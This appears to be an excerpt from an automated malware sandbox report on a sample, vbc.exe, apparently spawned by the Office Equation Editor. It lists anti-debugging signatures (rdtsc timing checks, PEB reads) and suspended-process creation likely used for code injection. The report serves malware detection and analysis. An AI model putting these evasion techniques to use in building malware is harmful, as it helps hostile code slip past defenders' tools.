Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8A83 rdtsc 6_2_002A8A83

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A8A83 rdtsc 6_2_002A8A83
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004027C4 mov ebx, dword ptr fs:[00000030h] 6_2_004027C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A863C mov eax, dword ptr fs:[00000030h] 6_2_002A863C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A946C mov eax, dword ptr fs:[00000030h] 6_2_002A946C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A5E70 mov eax, dword ptr fs:[00000030h] 6_2_002A5E70
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3271 mov eax, dword ptr fs:[00000030h] 6_2_002A3271
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3E5E mov eax, dword ptr fs:[00000030h] 6_2_002A3E5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0E8E mov eax, dword ptr fs:[00000030h] 6_2_002A0E8E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3ACB mov eax, dword ptr fs:[00000030h] 6_2_002A3ACB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A3B26 mov eax, dword ptr fs:[00000030h] 6_2_002A3B26
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A7F4E mov eax, dword ptr fs:[00000030h] 6_2_002A7F4E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A91AB mov eax, dword ptr fs:[00000030h] 6_2_002A91AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A0BA2 mov eax, dword ptr fs:[00000030h] 6_2_002A0BA2

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.691215980.0000000000840000.00000002.00020000.sdmp Binary or memory string: Program Manager<
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs